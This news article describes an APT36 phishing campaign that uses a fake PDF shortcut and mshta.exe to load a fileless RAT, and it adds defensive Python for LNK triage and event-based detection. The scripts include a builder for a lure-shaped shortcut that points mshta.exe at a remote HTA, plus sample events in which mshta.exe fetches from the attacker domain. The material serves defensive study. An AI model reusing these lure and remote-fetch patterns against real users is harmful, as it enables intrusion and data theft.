
APT36 Targets Indian Government Systems Using Malicious Windows LNK Files

CYFIRMA researchers have uncovered a sophisticated cyber-espionage campaign launched by APT36 (Transparent Tribe), a Pakistan-linked threat actor known for targeting Indian government, academic, and defense entities.

The attackers are deploying a weaponized Windows shortcut (LNK) file masquerading as a genuine PDF document to compromise victims’ systems and enable covert data theft and surveillance.

Malicious LNK File Delivers Fileless RAT

The campaign begins with spear-phishing emails containing ZIP archives titled “Online JLPT Exam Dec 2025.zip.” Within the archive lies a deceptive file named “Online JLPT Exam Dec 2025.pdf.lnk,” designed to appear as a legitimate PDF.

Legitimate shortcuts are usually only a few kilobytes; this one exceeds 2 MB because it embeds a complete PDF that serves as the decoy document, so the file size itself is a useful triage signal.

When executed, the shortcut abuses the legitimate Windows binary mshta.exe (a living-off-the-land binary that is rarely needed by end users) to fetch and run a remote HTML Application (HTA) from innlive[.]in.

This HTA loader runs without any visible window, decrypting and executing multiple payloads directly in memory, a "fileless" technique that leaves little on disk for file-based antivirus scanning.

The staged chain loads two encrypted objects, ReadOnly and WriteOnly, with WriteOnly executing a malicious DLL that functions as a Remote Access Trojan (RAT).
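The chain above can be caught before execution by inspecting the shortcut itself. The following Python script is an added example written for this page (it is not CYFIRMA's tooling and does not use the real sample): it parses the Shell Link header, the LinkInfo structure and the StringData fields, then flags the traits described above, namely a document-style double extension, an oversized file, an mshta.exe target with a URL argument, and a payload appended after the shortcut structure ends. The sample shortcut it builds, the hostname example.invalid and the 64 KB size threshold are constructed assumptions.

```python
import re
import struct

# Shell Link (MS-SHLLINK) constants.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]
DOC_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "jpg"}


def parse_lnk(data: bytes) -> dict:
    """Parse header, LinkInfo (for LocalBasePath) and StringData; record where
    the shell-link structure ends so appended bytes can be measured."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")
    fields, off = {}, header_size
    if flags & HAS_LINK_TARGET_ID_LIST:            # size-prefixed PIDL, skipped
        (idlist_size,) = struct.unpack_from("<H", data, off)
        off += 2 + idlist_size
    if flags & HAS_LINK_INFO:
        info_size, _hdr, info_flags, _vol, lbp_off = struct.unpack_from("<5I", data, off)
        if info_flags & 0x1:                        # VolumeIDAndLocalBasePath present
            end = data.index(b"\x00", off + lbp_off)
            fields["local_base_path"] = data[off + lbp_off:end].decode("cp1252")
        off += info_size
    for flag, name in STRING_FIELDS:               # fixed order per the spec
        if flags & flag:
            (count,) = struct.unpack_from("<H", data, off)
            width = 2 if flags & IS_UNICODE else 1
            raw = data[off + 2:off + 2 + count * width]
            fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            off += 2 + count * width
    while off + 4 <= len(data):                    # ExtraData blocks, then TerminalBlock
        (block_size,) = struct.unpack_from("<I", data, off)
        if block_size < 4:
            off += 4
            break
        if off + block_size > len(data):           # not a block: foreign data starts here
            break
        off += block_size
    fields["structure_end"] = off
    return fields


def triage_lnk(filename: str, data: bytes, size_limit: int = 64 * 1024) -> list:
    """Heuristic findings for one shortcut; an empty list means nothing odd."""
    f = parse_lnk(data)
    findings, name = [], filename.lower()
    if name.endswith(".lnk") and name[:-4].rsplit(".", 1)[-1] in DOC_EXTENSIONS:
        findings.append("document-lookalike double extension")
    if len(data) > size_limit:
        findings.append(f"oversized shortcut ({len(data)} bytes)")
    target = " ".join(f.get(k, "") for k in ("local_base_path", "relative_path", "arguments")).lower()
    if re.search(r"\bmshta(\.exe)?\b", target):
        findings.append("target launches mshta.exe")
    if re.search(r"https?://", target):
        findings.append("remote URL passed on the command line")
    trailing = len(data) - f["structure_end"]
    if trailing:
        findings.append(f"{trailing} bytes appended after the shortcut structure")
    return findings


def build_lnk(base_path: str, relative_path: str, arguments: str = "", appended: bytes = b"") -> bytes:
    """Construct a minimal, spec-conformant .lnk (test data, not a real sample)."""
    def sd(s):                                      # StringData entry: count + UTF-16LE
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    flags = HAS_LINK_TARGET_ID_LIST | HAS_LINK_INFO | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    idlist = struct.pack("<H", 2) + b"\x00\x00"    # IDList holding only the terminal ID
    volume = struct.pack("<IIII", 17, 3, 0, 16) + b"\x00"   # VolumeID with empty label
    base = base_path.encode("cp1252") + b"\x00"
    lbp_off = 28 + len(volume)
    link_info = struct.pack("<7I", lbp_off + len(base) + 1, 28, 1, 28, lbp_off, 0,
                            lbp_off + len(base)) + volume + base + b"\x00"
    return (header + idlist + link_info + sd(relative_path) + sd(arguments)
            + struct.pack("<I", 0) + appended)     # TerminalBlock, then anything appended


def build_sample_lure() -> bytes:
    """Shape of the reported lure: mshta.exe target, remote HTA, embedded PDF (all constructed)."""
    decoy = b"%PDF-1.4\n" + b"\x00" * (300 * 1024)
    return build_lnk(r"C:\Windows\System32\mshta.exe", r"..\..\..\Windows\System32\mshta.exe",
                     "http://example.invalid/lure.hta", appended=decoy)


if __name__ == "__main__":
    for finding in triage_lnk("Online JLPT Exam Dec 2025.pdf.lnk", build_sample_lure()):
        print("-", finding)
```

Run against a quarantined attachment with `triage_lnk(name, open(path, "rb").read())`. The "appended bytes" check is the most robust of the heuristics: a shortcut is fully described by its header, optional IDList/LinkInfo, StringData and ExtraData blocks, so any bytes after the TerminalBlock are carried for some purpose other than being a shortcut.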

Adaptive Malware and Persistent Access

The analyzed DLLs, ki2mtmkl.dll and iinneldc.dll, enable complete remote control of compromised systems.

Once activated, they establish encrypted Command-and-Control (C2) communication with IP 2.56.10[.]86 over TCP port 8621, exfiltrating system details like username, OS version, and installed antivirus software.

The malware can execute remote shell commands, capture screenshots, monitor clipboard activity, manage files, and steal sensitive documents, including Office files and PDFs.

One standout feature of this campaign is its antivirus-aware persistence mechanism. The malware queries Windows Management Instrumentation (WMI) to detect installed security tools and adapt accordingly.

For instance, when Kaspersky is detected, it stores its payloads in C:\Users\Public\core and persists through shortcuts placed in the Startup folder.

With other antivirus tools, such as Quick Heal or Avast, it alters its methods, creating batch files or registry entries to maintain access.

The campaign’s infrastructure also includes decoy PDFs and multiple fallback payloads, ensuring execution reliability and stealth. All exfiltrated data is Base64-encoded and AES-encrypted before transmission, maintaining confidentiality during network communication.

CYFIRMA attributes this operation to APT36’s continuing espionage focus, emphasizing intelligence gathering over financial gain.

Experts note the actor’s increased sophistication through living-off-the-land techniques, environment-aware persistence, and fileless payload delivery.

Security teams are advised to block LNK attachments at the mail gateway, restrict execution of mshta.exe (for example with AppLocker or WDAC rules, since end users rarely need it), and monitor for traffic to the listed infrastructure: innlive[.]in, drjagrutichavan[.]com, and 2.56.10[.]86 on TCP port 8621.

Behavior-based defenses and continuous monitoring remain critical against such evolving state-aligned intrusion campaigns.
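The advice above translates into a handful of detections on endpoint telemetry. The following Python rules are an added example for this page, not CYFIRMA's or any vendor's content: they run over event records shaped like Sysmon process-creation, network, file-creation and registry events (the records here are constructed, not logs from a real incident) and match what the article describes, namely mshta.exe pulling remote content from a shell-spawned process, connections to 2.56.10[.]86 or the named domains, files dropped under C:\Users\Public\core, and Run-key values pointing at scripts or at that directory. The normalised field names and the batch-file name in the sample are assumptions.

```python
import re

# Indicators published in the write-up (defanging brackets removed for matching).
IOC_DOMAINS = {"innlive.in", "drjagrutichavan.com"}
IOC_IPS = {"2.56.10.86"}
IOC_PORTS = {8621}
STAGING_DIR = "c:\\users\\public\\core"
STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"
RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run\\"


def rule_mshta_remote_script(ev):
    """mshta.exe handed a URL or inline script: the HTA loader stage."""
    if ev["type"] != "process_create" or not ev["image"].lower().endswith("\\mshta.exe"):
        return None
    if re.search(r"https?://|\b(javascript|vbscript):", ev["command_line"], re.I):
        parent = ev.get("parent_image", "").lower()
        via_shell = (" (spawned by explorer.exe, consistent with a double-clicked .lnk)"
                     if parent.endswith("\\explorer.exe") else "")
        return f"mshta.exe fetching remote/inline script{via_shell}: {ev['command_line']}"
    return None


def rule_c2_indicator(ev):
    """Outbound connection to the published C2 address or domains."""
    if ev["type"] != "network_connect":
        return None
    host = ev.get("dest_host", "").lower().rstrip(".")
    domain_hit = any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)
    ip_hit = ev.get("dest_ip") in IOC_IPS
    if domain_hit or ip_hit:
        port_note = " (known C2 port)" if ev.get("dest_port") in IOC_PORTS else ""
        dest = ev.get("dest_host") or ev.get("dest_ip")
        return f"{ev['image']} -> {dest}:{ev.get('dest_port')} matches campaign IOC{port_note}"
    return None


def rule_staging_or_startup(ev):
    """Files dropped in the reported staging directory or a Startup folder."""
    if ev["type"] != "file_create":
        return None
    path = ev["target_path"].lower()
    if path.startswith(STAGING_DIR + "\\"):
        return f"file written to staging directory: {ev['target_path']}"
    if STARTUP_DIR in path and path.endswith(".lnk"):
        return f"startup-folder shortcut created: {ev['target_path']}"
    return None


def rule_run_key_persistence(ev):
    """Run-key values pointing at script/LNK launchers or the staging directory."""
    if ev["type"] != "registry_set":
        return None
    key, value = ev["key"].lower(), ev["value_data"].lower()
    if RUN_KEY in key and (STAGING_DIR in value or re.search(r"\.(bat|cmd|hta|vbs|lnk)\b", value)):
        return f"Run-key persistence {ev['key']} = {ev['value_data']}"
    return None


RULES = [rule_mshta_remote_script, rule_c2_indicator, rule_staging_or_startup, rule_run_key_persistence]


def scan(events):
    """Apply every rule to every event; return (rule name, message) pairs in event order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            msg = rule(ev)
            if msg:
                alerts.append((rule.__name__, msg))
    return alerts


# Constructed events shaped like Sysmon IDs 1/3/11/13 after field normalisation; not real telemetry.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": "C:\\Windows\\System32\\mshta.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "command_line": 'mshta.exe "http://innlive.in/"'},
    {"type": "network_connect", "image": "C:\\Windows\\System32\\mshta.exe",
     "dest_ip": "2.56.10.86", "dest_port": 8621, "dest_host": ""},
    {"type": "file_create", "image": "C:\\Windows\\System32\\mshta.exe",
     "target_path": "C:\\Users\\Public\\core\\ki2mtmkl.dll"},
    {"type": "registry_set", "image": "C:\\Windows\\System32\\mshta.exe",
     "key": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\core",
     "value_data": "C:\\Users\\Public\\core\\launch.bat"},   # batch-file name is assumed
    # benign noise that must not fire
    {"type": "process_create", "image": "C:\\Windows\\System32\\notepad.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "command_line": "notepad.exe notes.txt"},
    {"type": "network_connect", "image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "dest_ip": "192.0.2.10", "dest_port": 443, "dest_host": "example.com"},
]

if __name__ == "__main__":
    for name, msg in scan(SAMPLE_EVENTS):
        print(f"[{name}] {msg}")
```

The mshta rule is behavioural and survives infrastructure changes; the IOC rule is exact and will go stale as soon as the actor rotates hosts, so treat the two as complementary rather than redundant. In production the staging-directory and Run-key rules should be scoped to the security products the page names (the malware only uses those paths under certain AV configurations), or at least tuned against a baseline of what legitimately writes to C:\Users\Public.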


The post APT36 Targets Indian Government Systems Using Malicious Windows LNK Files appeared first on Cyber Security News.
